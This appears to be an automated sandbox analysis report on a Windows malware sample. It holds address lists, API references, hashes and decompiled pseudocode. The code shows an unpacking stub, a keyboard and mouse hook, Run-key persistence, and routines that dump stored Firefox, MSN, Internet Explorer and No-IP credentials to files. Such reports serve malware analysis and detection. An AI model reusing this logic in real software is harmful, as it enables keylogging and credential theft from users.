                                    0x00406bd8
                                    0x00406bdb
                                    0x00406bdb
                                    0x00406bc4
                                    0x00406bc7
                                    0x00406bc7
                                    0x00406bad
                                    0x00406bb0
                                    0x00406bb0
                                    0x00406b96
                                    0x00406b99
                                    0x00406b99
                                    0x00406c4b
                                    0x00406c55
                                    0x00406c55
                                    0x00406c5d
                                    0x00406c65
                                    0x00406c6d
                                    0x00406c72
                                    0x00406c75
                                    0x00406c7a
                                    0x00406c84
                                    0x00406c84
                                    0x00406c89
                                    0x00406c97
                                    0x00406ca9
                                    0x00406cb1
                                    0x00406cc3
                                    0x00406ccb
                                    0x00406cd3
                                    0x00406cd8
                                    0x00406cdb
                                    0x00406ce0
                                    0x00406ce5
                                    0x00406cef
                                    0x00406cff
                                    0x00406d04
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d13
                                    0x00406d21
                                    0x00406d2c
                                    0x00406d34
                                    0x00406d3b
                                    0x00406d43
                                    0x00406d44
                                    0x00406d49
                                    0x00406d70
                                    0x00406d75
                                    0x00000000
                                    0x00406d4b
                                    0x00406d51
                                    0x00406d59
                                    0x00406d60
                                    0x00406d68
                                    0x00406d69
                                    0x00406d6e
                                    0x00406d84
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9a
                                    0x00406d9d
                                    0x00406da0
                                    0x00406da2
                                    0x00406dbd
                                    0x00406dc5
                                    0x00406dd2
                                    0x00406dd9
                                    0x00406de1
                                    0x00406dea
                                    0x00406def
                                    0x00406df2
                                    0x00406df5
                                    0x00406df7
                                    0x00406e0a
                                    0x00406df9
                                    0x00406dfe
                                    0x00406dfe
                                    0x00406da4
                                    0x00406da9
                                    0x00406da9
                                    0x00406e0f
                                    0x00406e14
                                    0x00406e17
                                    0x00406e23
                                    0x00406e34
                                    0x00406e46
                                    0x00406e50
                                    0x00406e55
                                    0x00406e63
                                    0x00406e6c
                                    0x00406e7d
                                    0x00406e8f
                                    0x00406e8f
                                    0x00406e9a
                                    0x00406eab
                                    0x00406ebd
                                    0x00406ec7
                                    0x00406ecc
                                    0x00406eda
                                    0x00406ee3
                                    0x00406ef4
                                    0x00406f06
                                    0x00406f06
                                    0x00406ecc
                                    0x00406f0b
                                    0x00406f10
                                    0x00406f13
                                    0x00406f1b
                                    0x00406f2c
                                    0x00406f3e
                                    0x00406f48
                                    0x00406f4d
                                    0x00406f5b
                                    0x00406f64
                                    0x00406f75
                                    0x00406f87
                                    0x00406f87
                                    0x00406f4d
                                    0x00406f8c
                                    0x00406f91
                                    0x00406f94
                                    0x00406f9c
                                    0x00406fad
                                    0x00406fbf
                                    0x00406fc9
                                    0x00406fce
                                    0x00406fdc
                                    0x00406fe5
                                    0x00406ff6
                                    0x00407008
                                    0x00407008
                                    0x00406fce
                                    0x0040700d
                                    0x00407012
                                    0x00407015
                                    0x00407017
                                    0x00407028
                                    0x00407030
                                    0x00407031
                                    0x00407038
                                    0x0040703f
                                    0x00407040
                                    0x00407041
                                    0x00407041
                                    0x00407046
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x00407060
                                    0x00407060
                                    0x00000000
                                    0x00406d6e

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406D95
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406DEA
                                      • Part of subcall function 00406088: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                      • Part of subcall function 00406088: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                      • Part of subcall function 00405C4C: RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 00405C92
                                      • Part of subcall function 00405C4C: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CBA
                                      • Part of subcall function 00405C4C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCopyFileQuery$CreateOpen
                                    • String ID: 4h@$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run
                                    • API String ID: 1469814539-1189044031
                                    • Opcode ID: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction ID: 0337d0d0e41828abccd6a10b42b8af73d9b7eafca3f8209fdc2fdaca8a3f3fd1
                                    • Opcode Fuzzy Hash: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction Fuzzy Hash: 13E1FC34A041099FDB11EBA9C881A9EB3B5AF45308F60417BF405BB2F6DB38AD45CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004019D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 31%
                                    			E004019D8() {
				struct HINSTANCE__* _t24;
				intOrPtr _t32;
				void* _t42;

				if( *0x0040E5BC != 0 ||  *0x40e024 == 0) {
					L3:
					if( *0x40d004 != 0) {
						 *0x40d068();
					}
					L5:
					while(1) {
						if( *((char*)(0x40e5bc)) == 2 &&  *0x40d000 == 0) {
							 *0x0040E5A0 = 0;
						}
						 *0x40d030();
						if( *((char*)(0x40e5bc)) <= 1 ||  *0x40d000 != 0) {
							if( *0x0040E5A4 != 0) {
								 *0x40d01c();
								_t32 =  *((intOrPtr*)(0x40e5a4));
								_t7 = _t32 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t32 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						 *0x40d034();
						if( *((char*)(0x40e5bc)) == 1) {
							 *0x0040E5B8();
						}
						if( *((char*)(0x40e5bc)) != 0) {
							E004019A8();
						}
						if( *0x40e594 == 0) {
							if( *0x40e014 != 0) {
								 *0x40e014();
							}
							ExitProcess( *0x40d000); // executed
						}
						memcpy(0x40e594,  *0x40e594, 0xb << 2);
						_t42 = _t42 + 0xc;
						0x40d000 = 0x40d000;
					}
				} else {
					do {
						 *0x40e024 = 0;
						 *((intOrPtr*)( *0x40e024))();
					} while ( *0x40e024 != 0);
					goto L3;
				}
			}






                                    0x004019ef
                                    0x00401a07
                                    0x00401a0e
                                    0x00401a10
                                    0x00401a10
                                    0x00000000
                                    0x00401a16
                                    0x00401a1a
                                    0x00401a23
                                    0x00401a23
                                    0x00401a26
                                    0x00401a30
                                    0x00401a3c
                                    0x00401a3e
                                    0x00401a44
                                    0x00401a47
                                    0x00401a47
                                    0x00401a4a
                                    0x00401a4d
                                    0x00401a54
                                    0x00401a54
                                    0x00401a4d
                                    0x00401a3c
                                    0x00401a59
                                    0x00401a63
                                    0x00401a65
                                    0x00401a65
                                    0x00401a6c
                                    0x00401a6e
                                    0x00401a6e
                                    0x00401a76
                                    0x00401a7f
                                    0x00401a81
                                    0x00401a81
                                    0x00401a8a
                                    0x00401a8a
                                    0x00401a9b
                                    0x00401a9b
                                    0x00401a9d
                                    0x00401a9d
                                    0x004019f6
                                    0x004019f6
                                    0x004019fc
                                    0x00401a00
                                    0x00401a02
                                    0x00000000
                                    0x004019f6

                                    APIs
                                    • FreeLibrary.KERNEL32(00400000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A54
                                    • ExitProcess.KERNEL32(00000000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExitFreeLibraryProcess
                                    • String ID: @&@$@&@$D0@
                                    • API String ID: 1404682716-1618351410
                                    • Opcode ID: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction ID: 5263b8d098c20f51001af61e3d55436e18b8afc55997b24df4f1e0aa037ee43b
                                    • Opcode Fuzzy Hash: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction Fuzzy Hash: 4521AF70A022418FEB209FA5C9887537BE5AF44318F284476D848AA2E2C77CCCC5CF5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405EAC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405EAC(long __eax, CHAR* __edx) {
				long _t4;
				long _t5;
				CHAR* _t7;

				_t7 = __edx;
				_t5 = __eax;
				GetProcAddress(LoadLibraryA("kernel32.dll"), "GetTempPathA");
				_t4 = GetTempPathA(_t5, _t7); // executed
				return _t4;
			}






                                    0x00405eae
                                    0x00405eb0
                                    0x00405ec2
                                    0x00405ec9
                                    0x00405ecd

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00405EBC
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405EC2
                                    • GetTempPathA.KERNELBASE(00000105,?,00000000,kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?), ref: 00405EC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadPathProcTemp
                                    • String ID: GetTempPathA$kernel32.dll
                                    • API String ID: 1686214323-3269217876
                                    • Opcode ID: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction ID: ddb0b176c331170ea1d21e324cbd039c108f0085b782601a862f0faf436c2439
                                    • Opcode Fuzzy Hash: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction Fuzzy Hash: CCC08CB121162035E5207AF60C8AE97084CCC842A632408337004F22C294BE1E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00455C10, Relevance: 7.7, APIs: 5, Instructions: 179librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			_entry_(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v128;
				void* _t64;
				void* _t65;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				signed int _t70;
				signed int _t71;
				unsigned int _t72;
				char _t82;
				signed char* _t84;
				long _t85;
				char* _t88;
				void* _t92;
				long _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t108;
				void* _t111;
				long _t112;
				char* _t123;
				intOrPtr* _t136;
				long _t140;
				intOrPtr* _t143;
				long _t147;
				intOrPtr* _t150;
				long _t154;
				struct HINSTANCE__* _t157;
				struct HINSTANCE__* _t160;
				signed int _t163;
				signed int _t255;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				char* _t271;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t282;
				void* _t283;
				intOrPtr* _t285;
				intOrPtr _t291;
				signed int _t316;
				unsigned int* _t317;
				CHAR* _t319;
				void* _t320;
				char* _t321;
				signed int _t322;
				unsigned int* _t323;
				signed int _t324;
				struct HINSTANCE__* _t325;
				unsigned int _t326;
				intOrPtr _t327;
				DWORD* _t328;
				intOrPtr _t329;
				void* _t330;
				signed int _t332;
				void* _t335;

				_t335 = __fp0;
				_t330 = __eflags;
				asm("pushad");
				_t322 = 0x412000;
				_t1 = _t322 - 0x11000; // 0x401000
				_t316 = _t1;
				_push(_t316);
				_t325 = _t324 | 0xffffffff;
				while(1) {
					_t259 =  *_t322;
					_t322 = _t322 - 0xfffffffc;
					asm("adc ebx, ebx");
					do {
						if(_t330 < 0) {
							_t64 =  *_t322;
							_t322 = _t322 + 1;
							 *_t316 = _t64;
							_t316 = _t316 + 1;
							__eflags = _t316;
							goto L47;
						}
						_t65 = 1;
						while(1) {
							_t260 = _t259 + _t259;
							if(_t260 == 0) {
								_t260 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t261 = _t260 + _t260;
							_t332 = _t261;
							if(_t332 >= 0) {
								goto L56;
							}
							L54:
							if(_t332 != 0) {
								L62:
								_t272 = 0;
								_t66 = _t65 - 3;
								__eflags = _t66;
								if(_t66 < 0) {
									_t261 = _t261 + _t261;
									__eflags = _t261;
									if(__eflags == 0) {
										_t261 =  *_t322;
										_t322 = _t322 - 0xfffffffc;
										asm("adc ebx, ebx");
									}
									L67:
									if(__eflags < 0) {
										L59:
										_t259 = _t261 + _t261;
										__eflags = _t259;
										if(_t259 == 0) {
											_t259 =  *_t322;
											_t322 = _t322 - 0xfffffffc;
											asm("adc ebx, ebx");
										}
										asm("adc ecx, ecx");
										L77:
										__eflags = _t325 - 0xfffffb00;
										asm("adc ecx, 0x2");
										_t285 = _t325 + _t316;
										__eflags = _t325 - 0xfffffffc;
										if(_t325 <= 0xfffffffc) {
											do {
												_t67 =  *_t285;
												_t285 = _t285 + 4;
												 *_t316 = _t67;
												_t316 = _t316 + 4;
												_t272 = _t272 - 4;
												__eflags = _t272;
											} while (_t272 > 0);
											_t316 = _t316 + _t272;
											break;
										} else {
											goto L78;
										}
										do {
											L78:
											_t68 =  *_t285;
											_t285 = _t285 + 1;
											 *_t316 = _t68;
											_t316 = _t316 + 1;
											_t272 = _t272 - 1;
											__eflags = _t272;
										} while (_t272 != 0);
										break;
									}
									_t272 = _t272 + 1;
									_t261 = _t261 + _t261;
									__eflags = _t261;
									if(__eflags == 0) {
										_t261 =  *_t322;
										_t322 = _t322 - 0xfffffffc;
										asm("adc ebx, ebx");
									}
									if(__eflags < 0) {
										goto L59;
									} else {
										goto L71;
										do {
											do {
												L71:
												_t262 = _t261 + _t261;
												__eflags = _t262;
												if(_t262 == 0) {
													_t262 =  *_t322;
													_t322 = _t322 - 0xfffffffc;
													asm("adc ebx, ebx");
												}
												asm("adc ecx, ecx");
												_t261 = _t262 + _t262;
												__eflags = _t261;
											} while (__eflags >= 0);
											if(__eflags != 0) {
												break;
											}
											_t261 =  *_t322;
											_t322 = _t322 - 0xfffffffc;
											__eflags = _t322;
											asm("adc ebx, ebx");
										} while (_t322 >= 0);
										_t272 = _t272 + 2;
										__eflags = _t272;
										goto L77;
									}
								}
								_t70 =  *_t322;
								_t322 = _t322 + 1;
								_t71 = _t70 ^ 0xffffffff;
								__eflags = _t71;
								if(__eflags == 0) {
									_pop(_t323);
									_t317 = _t323;
									goto L83;
									do {
										do {
											L83:
											_t72 =  *_t317;
											_t317 =  &(_t317[0]);
											__eflags = _t72 - 0xe8 - 1;
										} while (_t72 - 0xe8 > 1);
										__eflags =  *_t317 - 1;
									} while ( *_t317 != 1);
									asm("rol eax, 0x10");
									 *_t317 = ( *_t317 >> 8) - _t317 + _t323;
									__eflags =  &(_t317[1]);
									asm("loop 0xffffffdb");
									_t50 =  &(_t323[0x13c00]); // 0x450000
									_t319 = _t50;
									while(1) {
										L86:
										_t82 =  *_t319;
										__eflags = _t82;
										if(_t82 == 0) {
											break;
										}
										_t51 =  &(_t319[4]); // 0xf1ec
										_t271 = _t323 +  *_t51;
										_t321 =  &(_t319[8]);
										__eflags = _t321;
										_t325 = LoadLibraryA( &(_t323[0x156c2]) + _t82);
										while(1) {
											_t319 =  &(_t321[1]);
											_t255 =  *_t321;
											__eflags = _t255;
											if(_t255 == 0) {
												goto L86;
											}
											asm("repne scasb");
											_t82 = GetProcAddress(_t325, _t319);
											__eflags = _t82;
											if(_t82 == 0) {
												ExitProcess();
											}
											 *_t271 = _t82;
											_t271 =  &(_t271[4]);
										}
									}
									_t326 = _t323[0x156f6];
									_t59 = _t323 - 0x1000; // 0x400000
									_t320 = _t59;
									VirtualProtect(_t320, 0x1000, 4, _t328);
									_t60 = _t320 + 0x21f; // 0x40021f
									_t84 = _t60;
									 *_t84 =  *_t84 & 0x0000007f;
									_t61 =  &(_t84[0x28]);
									 *_t61 = _t84[0x28] & 0x0000007f;
									__eflags =  *_t61;
									_t85 = _t82;
									_push(_t85);
									VirtualProtect(_t320, 0x1000, _t85, _t328); // executed
									asm("popad");
									_t88 =  &_v128;
									do {
										_push(0);
										__eflags = _t328 - _t88;
									} while (_t328 != _t88);
									_t329 = _t328 - 0xffffff80;
									_push(_t326);
									_t327 = _t329;
									_t274 = 0xb;
									do {
										_push(0);
										_push(0);
										_t274 = _t274 - 1;
										__eflags = _t274;
									} while (_t274 != 0);
									_push(0x1000);
									E00403418(0x40bb04);
									_push(_t327);
									_push(0x40c0c4);
									_push( *[fs:eax]);
									 *[fs:eax] = _t329;
									_t92 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
									_t266 = _t92;
									_t93 = GetLastError();
									__eflags = _t93 - 0xb7;
									if(_t93 != 0xb7) {
										CloseHandle(_t266); // executed
									} else {
										CloseHandle(_t266);
										Sleep(0x2ee0);
									}
									_t95 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
									_t267 = _t95;
									__eflags = GetLastError() - 0xb7;
									if(__eflags != 0) {
										CloseHandle(_t267);
										_t98 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
										_t268 = _t98;
										__eflags = GetLastError() - 0xb7;
										if(__eflags != 0) {
											CloseHandle(_t268);
											L27:
											E004013A4(1,  &_v80);
											_t287 = "Restart";
											E00401E94(_v80, "Restart");
											if(__eflags != 0) {
												Sleep(0x3e8); // executed
											}
											E00404604(_t274, __eflags);
											E0040491C();
											E0040B118(_t287, _t320, _t323);
											_t108 =  *0x40d204; // 0x40e8f8
											_t111 = E00403568(0, 0, E00401F48( *_t108)); // executed
											_t269 = _t111;
											_t112 = GetLastError();
											__eflags = _t112 - 0xb7;
											if(_t112 != 0xb7) {
												CloseHandle(_t269); // executed
											} else {
												CloseHandle(_t269);
												Sleep(0x3e8);
												_t136 =  *0x40d204; // 0x40e8f8
												_t269 = E00403568(0, 0, E00401F48( *_t136));
												_t140 = GetLastError();
												__eflags = _t140 - 0xb7;
												if(_t140 != 0xb7) {
													CloseHandle(_t269);
												} else {
													CloseHandle(_t269);
													Sleep(0x3e8);
													_t143 =  *0x40d204; // 0x40e8f8
													_t269 = E00403568(0, 0, E00401F48( *_t143));
													_t147 = GetLastError();
													__eflags = _t147 - 0xb7;
													if(_t147 != 0xb7) {
														CloseHandle(_t269);
													} else {
														CloseHandle(_t269);
														Sleep(0x3e8);
														_t150 =  *0x40d204; // 0x40e8f8
														_t269 = E00403568(0, 0, E00401F48( *_t150));
														_t154 = GetLastError();
														__eflags = _t154 - 0xb7;
														if(_t154 != 0xb7) {
															CloseHandle(_t269);
														} else {
															ExitProcess(0);
														}
													}
												}
											}
											__eflags =  *((char*)( *0x40d1dc)) - 1;
											if( *((char*)( *0x40d1dc)) != 1) {
												__eflags = 0;
												E004013A4(0, 0x40f1e8);
											} else {
												E004013A4(0,  &_v88);
												E00406B54(_v88, _t269,  &_v84, _t320, _t323); // executed
												E00401B14(0x40f1e8, _v84);
											}
											E00406008( &_v92);
											E00401D58( &_v92, "XX--XX--XX.txt");
											E0040B93C( *0x40f1e8, _t269, _v92, _t320, _t323, __eflags);
											_t123 =  *0x40d214; // 0x40e8f4
											__eflags =  *_t123 - 1;
											if(__eflags == 0) {
												E0040B7FC(_t269, _t320, _t323, __eflags);
												Sleep(0x3e8); // executed
											}
											E0040B3C0(_t269, _t274, _t320, _t323); // executed
											L44:
											__eflags = 0;
											_pop(_t291);
											 *[fs:eax] = _t291;
											_push(0x40c0cb);
											return E00401AE4( &_v92, 0x12);
										}
										CloseHandle(_t268);
										_t157 =  *0x40e670; // 0x400000
										SetWindowsHookExA(0xd, E0040B0B8, _t157, 0);
										_t160 =  *0x40e670; // 0x400000
										SetWindowsHookExA(0xe, E0040B108, _t160, 0);
										while(1) {
											_t163 = E0040BA84(__eflags);
											__eflags = _t163;
											if(_t163 != 0) {
												break;
											}
											E00405918();
										}
										ExitProcess(0);
										goto L27;
									}
									CloseHandle(_t267);
									E00409AD4( &_v24, _t267, _t323, __eflags);
									E00401B14(0x40f1ec, _v24);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v28);
										E00401D58( &_v28, "NOIP.abc");
										_pop(_t283);
										E00405D70(_v28, _t267, _t283,  *0x40f1ec, _t323, __eflags);
									}
									E00409D28( &_v32, _t267, _t320, _t323);
									_t297 = _v32;
									E00401B14(0x40f1ec, _v32);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v36);
										E00401D58( &_v36, "MSN.abc");
										_t297 =  *0x40f1ec;
										_pop(_t282);
										E00405D70(_v36, _t267, _t282,  *0x40f1ec, _t323, __eflags);
									}
									E00409EF8( &_v40, _t267, _t297, _t320, _t323);
									E00401B14(0x40f1ec, _v40);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v44);
										E00401D58( &_v44, "FIREFOX.abc");
										_pop(_t281);
										E00405D70(_v44, _t267, _t281,  *0x40f1ec, _t323, __eflags);
									}
									E00409A84( &_v48);
									E00401B14(0x40f1ec, _v48);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v52);
										E00401D58( &_v52, "IELOGIN.abc");
										_pop(_t280);
										E00405D70(_v52, _t267, _t280,  *0x40f1ec, _t323, __eflags);
									}
									E00409A90( &_v56);
									E00401B14(0x40f1ec, _v56);
									__eflags =  *0x40f1ec;
									if(__eflags != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v60);
										E00401D58( &_v60, "IEPASS.abc");
										_pop(_t279);
										E00405D70(_v60, _t267, _t279,  *0x40f1ec, _t323, __eflags);
									}
									E00409A9C( &_v64, _t320, _t323, __eflags, _t335);
									E00401B14(0x40f1ec, _v64);
									__eflags =  *0x40f1ec;
									if(__eflags != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v68);
										E00401D58( &_v68, "IEAUTO.abc");
										_pop(_t278);
										E00405D70(_v68, _t267, _t278,  *0x40f1ec, _t323, __eflags);
									}
									E00409AB8( &_v72, _t320, _t323, __eflags);
									E00401B14(0x40f1ec, _v72);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v76);
										E00401D58( &_v76, "IEWEB.abc");
										_pop(_t277);
										E00405D70(_v76, _t267, _t277,  *0x40f1ec, _t323, __eflags);
									}
									goto L44;
								}
								_t325 = _t71 >> 1;
								goto L67;
							}
							_t261 =  *_t322;
							_t322 = _t322 - 0xfffffffc;
							asm("adc ebx, ebx");
							if(_t322 < 0) {
								goto L62;
							}
							L56:
							_t65 = _t65 - 1;
							_t259 = _t261 + _t261;
							if(_t259 == 0) {
								_t259 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t260 = _t259 + _t259;
							if(_t260 == 0) {
								_t260 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t261 = _t260 + _t260;
							_t332 = _t261;
							if(_t332 >= 0) {
								goto L56;
							}
						}
						L47:
						_t259 = _t259 + _t259;
						__eflags = _t259;
					} while (_t259 != 0);
				}
			}
























































































                                    0x00455c10
                                    0x00455c10
                                    0x00455c10
                                    0x00455c11
                                    0x00455c16
                                    0x00455c16
                                    0x00455c1c
                                    0x00455c1d
                                    0x00455c32
                                    0x00455c32
                                    0x00455c34
                                    0x00455c37
                                    0x00455c39
                                    0x00455c39
                                    0x00455c28
                                    0x00455c2a
                                    0x00455c2b
                                    0x00455c2d
                                    0x00455c2d
                                    0x00000000
                                    0x00455c2d
                                    0x00455c3b
                                    0x00455c40
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c51
                                    0x00455c51
                                    0x00455c7b
                                    0x00455c7b
                                    0x00455c7d
                                    0x00455c7d
                                    0x00455c80
                                    0x00455c93
                                    0x00455c93
                                    0x00455c95
                                    0x00455c97
                                    0x00455c99
                                    0x00455c9c
                                    0x00455c9c
                                    0x00455c9e
                                    0x00455c9e
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6e
                                    0x00455c70
                                    0x00455c72
                                    0x00455c75
                                    0x00455c75
                                    0x00455c77
                                    0x00455ccd
                                    0x00455ccd
                                    0x00455cd3
                                    0x00455cd6
                                    0x00455cd9
                                    0x00455cdc
                                    0x00455cec
                                    0x00455cec
                                    0x00455cee
                                    0x00455cf1
                                    0x00455cf3
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cfb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00455cde
                                    0x00455cde
                                    0x00455cde
                                    0x00455ce0
                                    0x00455ce1
                                    0x00455ce3
                                    0x00455ce4
                                    0x00455ce4
                                    0x00455ce4
                                    0x00000000
                                    0x00455ce7
                                    0x00455ca0
                                    0x00455ca1
                                    0x00455ca1
                                    0x00455ca3
                                    0x00455ca5
                                    0x00455ca7
                                    0x00455caa
                                    0x00455caa
                                    0x00455cac
                                    0x00000000
                                    0x00455cae
                                    0x00000000
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cb0
                                    0x00455cb2
                                    0x00455cb4
                                    0x00455cb7
                                    0x00455cb7
                                    0x00455cb9
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbf
                                    0x00000000
                                    0x00000000
                                    0x00455cc1
                                    0x00455cc3
                                    0x00455cc3
                                    0x00455cc6
                                    0x00455cc6
                                    0x00455cca
                                    0x00455cca
                                    0x00000000
                                    0x00455cca
                                    0x00455cac
                                    0x00455c85
                                    0x00455c87
                                    0x00455c88
                                    0x00455c88
                                    0x00455c8b
                                    0x00455d02
                                    0x00455d03
                                    0x00455d05
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0c
                                    0x00455d0f
                                    0x00455d0f
                                    0x00455d13
                                    0x00455d13
                                    0x00455d21
                                    0x00455d2d
                                    0x00455d2f
                                    0x00455d34
                                    0x00455d36
                                    0x00455d36
                                    0x00455d3c
                                    0x00455d3c
                                    0x00455d3e
                                    0x00455d3e
                                    0x00455d40
                                    0x00000000
                                    0x00000000
                                    0x00455d42
                                    0x00455d4c
                                    0x00455d4f
                                    0x00455d4f
                                    0x00455d58
                                    0x00455d59
                                    0x00455d5b
                                    0x00455d5c
                                    0x00455d5c
                                    0x00455d5e
                                    0x00000000
                                    0x00000000
                                    0x00455d64
                                    0x00455d6d
                                    0x00455d6d
                                    0x00455d6f
                                    0x00455d78
                                    0x00455d78
                                    0x00455d71
                                    0x00455d73
                                    0x00455d73
                                    0x00455d59
                                    0x00455d7e
                                    0x00455d84
                                    0x00455d84
                                    0x00455d95
                                    0x00455d97
